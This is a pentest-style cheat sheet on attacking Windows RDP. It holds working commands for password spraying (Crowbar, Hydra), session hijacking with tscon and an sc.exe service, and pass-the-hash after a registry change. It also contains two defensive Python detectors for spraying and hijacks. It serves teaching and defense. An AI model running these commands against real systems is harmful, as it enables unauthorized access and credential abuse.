RDP - Remote Desktop Protocol

This section will cover ways to attack Remote Desktop Protocol (RDP).

Table of Contents
  • Overview
  • Enumeration
    • Nmap
  • Connection
    • xfreerdp
    • rdesktop
    • remmina
  • Exploitation
    • Password Spraying
    • Session Hijacking
    • Pass-the-Hash (PtH)

Overview

RDP is a proprietary protocol developed by Microsoft. It provides a graphical interface for connecting to another computer over the network.

By default, RDP uses TCP port 3389.

Because RDP authenticates with user credentials, it is susceptible to attacks such as password spraying and brute forcing. In some cases, no password is required to log in at all.

Enumeration

There are several tools that can be used to enumerate RDP.

This section will cover the following tools:

  • Nmap

Nmap

We can use the following command to target port 3389 assuming RDP is running on that port.

nmap -sV -Pn -p 3389 <Target IP>

Command breakdown:

  • -sV - Probe the open port to identify the service and its version.
  • -Pn - Skip host discovery (no ping) and treat the host as up.
  • -p 3389 - Specify the port to scan.
  • <Target IP> - Specify the target IP address.

Connection

There are different tools we can use to connect over RDP from both Linux and Windows. On Windows, we can use the built-in RDP client; on Linux, we can use tools such as xfreerdp, rdesktop, or remmina to connect to Windows machines over RDP.

xfreerdp

The following command can be used to establish a connection using xfreerdp.

xfreerdp /v:<Target IP> /u:<username> /p:<password>

Command breakdown:

  • /v:<Target IP> - Specify the target IP address.
  • /u:<username> - Specify the username to use for authentication.
  • /p:<password> - Specify the password to use for authentication.

If the account is a domain account, we can use the /d:<domain> option alongside the above.

We can also transfer files to and from the target by mapping a local directory as a drive with xfreerdp.

xfreerdp /v:<Target IP> /d:<domain> /u:<username> /p:<password> /drive:linux,/path/to/directory/here

Command breakdown:

  • /v:<Target IP> - Specify the remote machine IP address.
  • /d:<domain> - Specify the domain name.
  • /u:<username> - Specify the username to authenticate as.
  • /p:<password> - Specify the password to authenticate with.
  • /drive:linux,/path/to/directory/here - Maps the specified local directory to a drive called linux on the remote machine.

rdesktop

The following command can be used to establish a connection using rdesktop.

rdesktop <Target IP> -d <domain> -u <username> -p '<password>'

Command breakdown:

  • <Target IP> - IP address of the target.
  • -d <domain> - Specify the domain of the remote machine.
  • -u <username> - Specify the username to login as.
  • -p '<password>' - Specify the password to use to authenticate.

We can use the following command to transfer files to and from the target using rdesktop.

rdesktop <Target IP> -d <domain> -u <username> -p '<password>' -r disk:linux='/path/to/local/dir'

Command breakdown:

  • <Target IP> - IP address of the target.
  • -d <domain> - Specify the domain of the remote machine.
  • -u <username> - Specify the username to login as.
  • -p '<password>' - Specify the password to use to authenticate.
  • -r disk:linux='/path/to/local/dir' - Specify the drive name to show on Windows and the local path on the attacker's machine to share.

remmina

To use remmina, we can simply use the GUI and provide the target IP address, username, and password. Optionally, if the user account is part of a domain, we can specify the domain.

Exploitation

There are many tools and methods that can be used to perform various attacks on RDP.

This section will cover the following attacks:

  • Password Spraying
  • Session Hijacking
  • Pass-the-Hash (PtH)

Password Spraying

Password spraying is where an attacker tries one or a few known passwords against a list of usernames in order to find a valid login.

This section will cover the following tools:

  • Crowbar
  • Hydra

Crowbar:

crowbar -b rdp -s <Target IP>/32 -U <username wordlist> -c '<password>'

Command breakdown:

  • -b rdp - Set the protocol to brute force to RDP.
  • -s <Target IP>/32 - Specify the target IP address with the CIDR notation.
  • -U <username wordlist> - Specify the username wordlist to use.
  • -c '<password>' - Specify the password to use for authentication.

Hydra:

hydra -L <username wordlist> -p '<password>' <Target IP> rdp

Command breakdown:

  • -L <username wordlist> - Specify the username wordlist to use.
  • -p '<password>' - Specify the password to use for authentication.
  • <Target IP> - Specify the target IP address.
  • rdp - Specify the protocol to attack.
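The flip side of the spray above, from the defender's seat: a small detector for this pattern in Windows Security log data. This is an added example, not part of the original page or of Crowbar or Hydra; the log lines are constructed and flattened to the five fields the check needs (timestamp, event ID, logon type, target user, source IP), which is an assumed export format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log sample (not real data), one event per line:
# "<timestamp> <EventID> <LogonType> <TargetUserName> <IpAddress>"
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive (RDP).
SAMPLE_EVENTS = """\
2024-05-01T09:00:01 4625 10 alice 10.10.14.5
2024-05-01T09:00:02 4625 10 bob 10.10.14.5
2024-05-01T09:00:03 4625 10 carol 10.10.14.5
2024-05-01T09:00:04 4625 10 dave 10.10.14.5
2024-05-01T09:00:05 4625 10 erin 10.10.14.5
2024-05-01T09:00:06 4624 10 frank 10.10.14.5
2024-05-01T09:01:00 4625 10 alice 192.168.1.20
2024-05-01T09:30:00 4625 3 svc_backup 10.10.14.5
"""

def parse_events(text):
    rows = (line.split() for line in text.splitlines())
    return [{"ts": datetime.fromisoformat(ts), "id": int(eid), "logon_type": int(lt),
             "user": user.lower(), "ip": ip} for ts, eid, lt, user, ip in rows]

def detect_rdp_spray(events, window=timedelta(minutes=10), min_users=5):
    """Map source IP -> accounts for sources whose failed RDP logons hit at least
    min_users distinct accounts within one window (a spray is wide, not deep)."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["logon_type"] == 10:
            failures[e["ip"]].append(e)
    hits = {}
    for ip, evs in failures.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits

def spray_successes(events, hits):
    """Accounts that then logged on over RDP from a flagged source: the sprayed password worked."""
    out = {}
    for ip in hits:
        ok = {e["user"] for e in events
              if e["id"] == 4624 and e["logon_type"] == 10 and e["ip"] == ip}
        if ok:
            out[ip] = sorted(ok)
    return out
```

Because each account sees only one failure, a per-account lockout threshold never fires on this traffic; the per-source distinct-user count is what catches it.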

Session Hijacking

If multiple users are logged in, we can attempt to hijack another user's session. To hijack a session without knowing that user's password, we need SYSTEM privileges and the tscon.exe binary from Microsoft, which connects to another desktop session.

We need the session ID of the target user's session and the name of our own session. To find them, we can run query user in PowerShell.

Once we have the required information, we can use the following command from command prompt.

tscon <Target Session ID> /dest:<Attacker Session Name>

Command breakdown:

  • <Target Session ID> - Specify the numeric session ID of the target session to hijack.
  • /dest:<Attacker Session Name> - Specify the name of our current session (for example rdp-tcp#13).

An example will be:

tscon 4 /dest:rdp-tcp#13

If we have local administrator privileges, we can use the sc.exe binary to create a Windows service. We need to provide the service name and the binary path (the command to execute).

sc.exe create <service name> binpath= "cmd.exe /k tscon <Session ID> /dest:<Attacker Session Name>"

Command breakdown:

  • create <service name> - Specify to create a service with the specified name.
  • binpath= "cmd.exe /k tscon ..." - Specify the command the service runs, which launches the tscon.exe binary (sc.exe requires the space after binpath=).
  • <Session ID> - Specify the session ID of the target to hijack.
  • /dest:<Attacker Session Name> - Specify our current session name.

Once done, we can use the following command to start the created service.

net start <service name>

Note: This method does not work in Windows Server 2019 and later.
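Detection for the two hijack routes just described (tscon run directly as SYSTEM, or wrapped in a service created with sc.exe), as an added example that is not from the original page. The records are constructed: 7045 service-install and 4688 process-creation events reduced to the fields the check uses (event ID, account, command line, service name), which is an assumed export format.

```python
import re

# Constructed sample records (not real logs): 7045 = service installed (System log),
# 4688 = process created (Security log), reduced to the fields this check needs.
SAMPLE_RECORDS = [
    {"id": 7045, "who": "LocalSystem", "name": "sessionhijack",
     "cmd": "cmd.exe /k tscon 2 /dest:rdp-tcp#13"},
    {"id": 7045, "who": "LocalSystem", "name": "SysmonDrv", "cmd": r"C:\Windows\SysmonDrv.sys"},
    {"id": 4688, "who": r"NT AUTHORITY\SYSTEM", "cmd": "tscon.exe 4 /dest:console"},
    {"id": 4688, "who": r"CORP\helpdesk", "cmd": "tscon.exe 4 /dest:console /password:*"},
]

TSCON_RE = re.compile(r"\btscon(?:\.exe)?\s+(\S+)\s+/dest:(\S+)", re.IGNORECASE)
SYSTEM_ACCOUNTS = {"localsystem", r"nt authority\system"}

def classify(record):
    """Return (severity, detail) when the command line attaches a session with tscon,
    else None. The technique above is tscon run as SYSTEM, or wrapped in a new
    service, with no /password: that is what gets rated high."""
    m = TSCON_RE.search(record["cmd"])
    if not m:
        return None
    target, dest = m.group(1), m.group(2)
    detail = f"session {target} attached to {dest} by {record['who']}"
    if record["id"] == 7045:
        return ("high", f"service {record['name']!r}: {detail}")  # sc.exe route
    if "/password" in record["cmd"].lower():
        return ("info", detail)  # caller supplied the session password: normal reconnect
    if record["who"].lower() in SYSTEM_ACCOUNTS:
        return ("high", detail)  # SYSTEM reattaching a session without a password
    return ("medium", detail)

def scan(records):
    findings = []
    for r in records:
        verdict = classify(r)
        if verdict:
            findings.append((r["id"],) + verdict)
    return findings
```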

Pass-the-Hash (PtH)

We can also provide a hash if we are unable to crack it. The hash can be obtained using different methods such as dumping the SAM database or using Mimikatz. View the "Windows Password Attacks" page for more information on this.

A caveat is that Restricted Admin Mode, which is disabled by default, must be enabled on the target. Otherwise, we get an error when attempting this attack.

To enable it, we add a registry value called DisableRestrictedAdmin (REG_DWORD) set to 0 under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa using the following command.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Once added, we can use xfreerdp with the /pth: option.

xfreerdp /v:<Target IP> /u:<username> /pth:<hash>

Command breakdown:

  • /v:<Target IP> - Specify the target IP address.
  • /u:<username> - Specify the username to use for authentication.
  • /pth:<hash> - Specify the hash to use for authentication.